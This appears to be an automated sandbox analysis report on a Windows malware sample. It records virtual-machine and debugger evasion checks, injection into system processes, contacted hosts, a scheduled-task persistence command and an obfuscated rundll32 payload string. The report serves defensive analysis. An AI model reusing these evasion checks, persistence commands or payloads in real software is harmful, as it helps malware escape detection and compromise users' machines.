bovoj.exevboxservice.exeVGAuthService.exevmtoolsd.exeprl_cc.exeHTTPDebuggerUI.exeHttpAnalyzerStdV7.exePROCEXP64.exe9vcQbULrEEOHDRqecloudsafelineyq7T94qzPuDeOrTe80urpbYHQ3908aPeycDDggZJIPRjtkOe8J4Wdllbx1ApOW9evbZ1uo2T2UbMGtUdBSQDYJSbaLF5CgvcsFImbSiBECUOLzpcIk2VP28ir0vTy4TbDYVLfRsd5XNE93cYiigvV5kbWQ4w2roU3OQVpirDLVGrVmVTmqRp5j7SuNTW6WJSccDmayghiNoZWAXRSZKcI5fN6d9y9HJRZHIX2jJ5ndQDFLbQ7Gsn9COrx41kruaQxiHNEOIqB1voNhHQfpG6n3LiJpAEsKGQbMh2wfPZkMIH3jpNw2wwL4qOww0SAvLN7QPqaculbYlOPumLDjFmGrxyrkqKoVNJkrD4pQP2PQ8FNc7JabGGRSw4W0K7VSsICQYE9Jt8N0nVh1MITQsnOGZQBxmijylHv2DLczJ486OVC7eHTPLwz4Nt1Dg4jsqGyzCqbMr6MBLZrXjGOxTXcYoA7fBPn0eGH7Ex8dg8NsycsAOGd5g0Nv7r0LVA09KGcaWtJO5Tb2I2LhAGZrMz4T0Epaso079GslJNUY5E4dliUTNFlXFuZSNaEVRrIGWChIYUgq9hHpqOdBLBiAQmME3ZwAAGkEJB4gPxySrtR5EFN43BbtxiTk2KKfog8JcArlOy8gS3rrvRRJNAUFJSzgakwzM2deQ8oCWpzq6o4rIWMrY77FlbkvUsfeYwtpb6Y2CToyPqlwYaqay5DndXG1BsVppP4Jq5WxP1Oq3y3dHBZrc5X4kw1cn7yJdb9J450JE0s2Rdql7gxWP4zkmA4WMYvM2YZr24zUIl8P9x5RU6f5F2Hm4yAEQ4STv1pKj0
              Source: 2560.exe, 00000011.00000003.362777696.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467740836.0000000003649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: fontview.exe, 00000013.00000002.467740836.0000000003649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor-
              Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
              Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
              Source: explorer.exe, 00000001.00000000.268540188.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
              Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink
              Source: ngentask.exe, 00000012.00000002.457360709.00000000017A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
              Source: 226F.exe, 00000010.00000002.479576664.000000000168A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
              Source: fontview.exe, 00000013.00000003.444938250.000000000368E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445080033.0000000003695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
              Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink?
              Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorvirtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService.exevmwareuser.exevmwaretray.exevmtoolsd.exeVMwareVMWAREvdservice.exevdagent.exeqemu-ga.e
              Source: fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
              Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: fontview.exe, 00000013.00000002.467716814.0000000003647000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\qemu-gag
              Source: explorer.exe, 00000001.00000000.270686003.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
              Source: fontview.exe, 00000013.00000003.445080033.0000000003695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amdxataApplication Management Group PolicyApplication PopupAppReadinessarcsasAsyncMacatapib06bdrvBasicRenderbeepBugCheckcdromcht4iscsicht4vbdDCOMDfsSvcDhcpDhcpv6diskDisplayDnsapiDnscachee1iexpressebdrveventlogexFATFltMgrfvevolHidBthhidi2cHpSAMDHttpi8042prtiaStorAVCiaStorVibbusIntel-iaLPSS-GPIOIntel-iaLPSS-I2CIntel-iaLPSS2-GPIO2Intel-iaLPSS2-I2CintelppmIPMGMIPMIDRVIPNATHLPIPRouterManagerireventsisapnpiScsiPrtItSas35ikbdclasskbdhidkdnicKerberosLfsvclltdioLmHostsLsaSrvLSI_SASLSI_SAS2iLSI_SAS3iLSI_SSSLSMmegasasmegasas2imegasas35imegasrMicrosoft-Windows-Audit-CVEMicrosoft-Windows-BitLocker-APIMicrosoft-Windows-BitLocker-DriverMicrosoft-Windows-Bits-ClientMicrosoft-Windows-Bluetooth-BthLEPrepairingMicrosoft-Windows-CoreSystem-InitMachineConfigMicrosoft-Windows-CoreSystem-NetProvision-JoinProviderOnlineMicrosoft-Windows-CorruptedFileRecovery-ClientMicrosoft-Windows-CorruptedFileRecovery-ServerMicrosoft-Windows-Devices-BackgroundMicrosoft-Windows-DfsSvcMicrosoft-Windows-Dhcp-ClientMicrosoft-Windows-DHCPv6-ClientMicrosoft-Windows-Diagnostics-NetworkingMicrosoft-Windows-Directory-Services-SAMMicrosoft-Windows-DiskDiagnosticMicrosoft-Windows-DistributedCOMMicrosoft-Windows-DNS-ClientMicrosoft-Windows-DriverFrameworks-UserModeMicrosoft-Windows-EnhancedStorage-EhStorTcgDrvMicrosoft-Windows-EventCollectorMicrosoft-Windows-EventlogMicrosoft-Windows-exFAT-SQMMicrosoft-Windows-Fat-SQMMicrosoft-Windows-Fault-Tolerant-HeapMicrosoft-Windows-FilterManagerMicrosoft-Windows-FirewallMicrosoft-Windows-FMSMicrosoft-Windows-FunctionDiscoveryHostMicrosoft-Windows-GPIO-ClassExtensionMicrosoft-Windows-GroupPolicyMicrosoft-Windows-HALMicrosoft-Windows-HttpEventMicrosoft-Windows-Hyper-V-HypervisorMicrosoft-Windows-IphlpsvcMicrosoft-Windows-IsolatedUserModeMicrosoft-Windows-Kernel-BootMicrosoft-Windows-Kernel-GeneralMicrosoft-Windows-Kernel-Interrupt-SteeringMicrosoft-Windows-Kernel-IOMicrosoft-Windows-Kernel-PnPMicrosoft-Windows-Kernel-PowerMicrosoft-Windows-Kernel-Processor-PowerMicrosoft-Windows-Kernel-TmMicrosoft-Windows-Kernel-WHEAMicrosoft-Windows-Kernel-XDVMicrosoft-Windows-LanguagePackSetupMicrosoft-Windows-Memory-Diagnostic-Task-HandlerMicrosoft-Windows-MemoryDiagnostics-ResultsMicrosoft-Windows-MemoryDiagnostics-ScheduleMicrosoft-Windows-MountMgrMicrosoft-Windows-NDISMicrosoft-Windows-NdisImPlatformSysEvtProviderMicrosoft-Windows-NetworkBridgeMicrosoft-Windows-NtfsMicrosoft-Windows-Ntfs-UBPMMicrosoft-Windows-OfflineFilesMicrosoft-Windows-OverlayFilterMicrosoft-Windows-PersistentMemory-NvdimmMicrosoft-Windows-PersistentMemory-PmemDiskMicrosoft-Windows-Power-Meter-PollingMicrosoft-Windows-Power-TroubleshooterMicrosoft-Windows-ReFSMicrosoft-Windows-ReFS-v1Microsoft-Windows-ResetEngMicrosoft-Windows-Resource-Exhaustion-DetectorMicrosoft-Windows-ResourcePublicationMicrosoft-Windows-SCPNPMicrosoft-Windows-Serial-ClassExtensionMicrosoft-Windows-Serial-ClassExtension-V2Microsoft-Windows-ServicingMicrosoft-Windows-SetupMicrosoft-Windows-SetupPlatformMicrosoft-Windows-SPB-ClassE
              Source: explorer.exe, 00000001.00000000.275078678.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
              Source: fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
              Source: explorer.exe, 00000001.00000000.275078678.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00428390 FindFirstFileExW,

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\fontview.exeThread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\fontview.exeThread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\fontview.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_02BF0D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_02BF092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_02C30D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_02C3092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0042950B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugFlags
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugObjectHandle
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugObjectHandle
              Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0042BCAF GetProcessHeap,
              Source: C:\Windows\SysWOW64\fontview.exeSystem information queried: KernelDebuggerInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00413F2C SetUnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeDomain query: potunulit.org
              Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 109.206.243.168 80
              Source: C:\Windows\System32\dllhost.exeDomain query: transfer.sh
              Source: C:\Windows\explorer.exeFile created: dbjigst.1.drJump to dropped file
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Roaming\dbjigstSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Roaming\dbjigstSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Windows\System32\rundll32.exeSection loaded: unknown target: C:\Windows\System32\dllhost.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess created: Base64 decoded start-sleep -seconds 90
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess created: Base64 decoded start-sleep -seconds 90
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory allocated: C:\Windows\SysWOW64\fontview.exe base: 3290000 protect: page read and write
              Source: C:\Users\user\AppData\Local\Temp\2560.exeMemory written: C:\Users\user\AppData\Local\Temp\2560.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 3290000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeThread created: C:\Windows\explorer.exe EIP: 3491B14
              Source: C:\Users\user\AppData\Roaming\dbjigstThread created: unknown EIP: 5851B14
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 10EE008
              Source: C:\Users\user\AppData\Local\Temp\226F.exeMemory written: C:\Windows\SysWOW64\fontview.exe base: 3290000
              Source: 16.3.226F.exe.d030000.1.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
              Source: 16.3.226F.exe.d030000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
              Source: 18.2.ngentask.exe.400000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
              Source: Library.exe.25.dr, ue067.csReference to suspicious API methods: ('?', 'GetProcAddress@kernel32.dll'), ('?', 'LoadLibrary@kernel32.dll')
              Source: C:\Windows\System32\rundll32.exeThread APC queued: target process: C:\Windows\System32\dllhost.exe
              Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns5aa2a3.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8fp|afoaeqbpagl7aeenaemaaaa3|wbvaesazwbj|i0cwuid7cjobp8caabig8qow||mzmxmiuqkgp9iivqkeeijtpskcf0bsitejdbvsikejieboehval8ismdejbataet9doebeeidwagpad0qgqfasdmwahml|p8diwwksapisf+lwuiltksbvhsa|wprsivkigmi9wjrwwyfzuilbpslyppwm8lii1d|geg70xq2sip|wibiiwjio8l|dcpmg3highx|gkylqfbmqypvogt0bxers3ui|heqebaudavii78a69vii0j9amh+agbau1vwv0fuv0fvqvzbv10bzv+bou1atyv4tp+l8kil2q+f|p7z8exjstxbgtz|cvbfaaapheq+8|bbi4qjippwhf|asi08aq+e1t5qeyo8cywtaq+e|cfz8eslzybei|9fhit3jeslt|8ytaphtapzsp8d8tpjryxjd|uepppwtyveqyv|eeuz0kgd04r|aotadb1bwcrvdq++wpoaauqd|dc|exxsqyh6qv|8dxx0dopbaf9jg8aeqtvjc|9p68alwq+3dp9oryssi0wd6+90wdptqhb0uuh7ixtbanmzyyocf0ylwuspwcniexsdyouqaugkanuq|+0zwdp2qtsm+bbgekyag8ybg|j|chlu6wpii8v|qf|vsyke94p9xeqqxaq7bxhy|a9mauffqv5bxb9bxf9exvszf0jvgexgawqai+no|2b+||9ihcapw4sydsbmja8biysq38gz|+ibfscnx|8eti1frjpsi9|l|1qkaiagtiuv4a+ea3ugragqm|fai9orieijfct1ikygciagsivwd|oes3ugpibqsi1w|whejudasi2m|ssfeuil2oh8|a5+ii1wsn4geoihzpbz8ohn7ybeiwan01ciqscmifjkiymeaysahxle8|cldtogj1ijjcrxeqcwksdo7thviiucltjmi12|okid+2xiiiaw|0yjzcq4tiuk7hoytilchagejny2hxggko0rjudlmiz7jpdz8eml1ojp7fwfmiqcedjijyt+edjbgpmhju9s90qwgkqcg+kbdffzgbx4mifszxi|du2lhct0ijgu+yt4nqhcsdvycv84g|psdjnejxtjqpoaleg4ajgaeqygqmoi+hqzrlywvsaxsy1ujgyrienfg+hs6gucmeil|c6mihhihf90es+lvujmjjabmuin|0wkqp|xsiheahqhysqtcc0b
              Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns5aa2a3.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8fp|afoaeqbpagl7aeenaemaaaa3|wbvaesazwbj|i0cwuid7cjobp8caabig8qow||mzmxmiuqkgp9iivqkeeijtpskcf0bsitejdbvsikejieboehval8ismdejbataet9doebeeidwagpad0qgqfasdmwahml|p8diwwksapisf+lwuiltksbvhsa|wprsivkigmi9wjrwwyfzuilbpslyppwm8lii1d|geg70xq2sip|wibiiwjio8l|dcpmg3highx|gkylqfbmqypvogt0bxers3ui|heqebaudavii78a69vii0j9amh+agbau1vwv0fuv0fvqvzbv10bzv+bou1atyv4tp+l8kil2q+f|p7z8exjstxbgtz|cvbfaaapheq+8|bbi4qjippwhf|asi08aq+e1t5qeyo8cywtaq+e|cfz8eslzybei|9fhit3jeslt|8ytaphtapzsp8d8tpjryxjd|uepppwtyveqyv|eeuz0kgd04r|aotadb1bwcrvdq++wpoaauqd|dc|exxsqyh6qv|8dxx0dopbaf9jg8aeqtvjc|9p68alwq+3dp9oryssi0wd6+90wdptqhb0uuh7ixtbanmzyyocf0ylwuspwcniexsdyouqaugkanuq|+0zwdp2qtsm+bbgekyag8ybg|j|chlu6wpii8v|qf|vsyke94p9xeqqxaq7bxhy|a9mauffqv5bxb9bxf9exvszf0jvgexgawqai+no|2b+||9ihcapw4sydsbmja8biysq38gz|+ibfscnx|8eti1frjpsi9|l|1qkaiagtiuv4a+ea3ugragqm|fai9orieijfct1ikygciagsivwd|oes3ugpibqsi1w|whejudasi2m|ssfeuil2oh8|a5+ii1wsn4geoihzpbz8ohn7ybeiwan01ciqscmifjkiymeaysahxle8|cldtogj1ijjcrxeqcwksdo7thviiucltjmi12|okid+2xiiiaw|0yjzcq4tiuk7hoytilchagejny2hxggko0rjudlmiz7jpdz8eml1ojp7fwfmiqcedjijyt+edjbgpmhju9s90qwgkqcg+kbdffzgbx4mifszxi|du2lhct0ijgu+yt4nqhcsdvycv84g|psdjnejxtjqpoaleg4ajgaeqygqmoi+hqzrlywvsaxsy1ujgyrienfg+hs6gucmeil|c6mihhihf90es+lvujmjjabmuin|0wkqp|xsiheahqhysqtcc0b
              Source: C:\Users\user\AppData\Local\Temp\336E.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
              Source: C:\Windows\System32\dllhost.exeProcess created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
              Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
              Source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
              Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.270172143.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
              Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
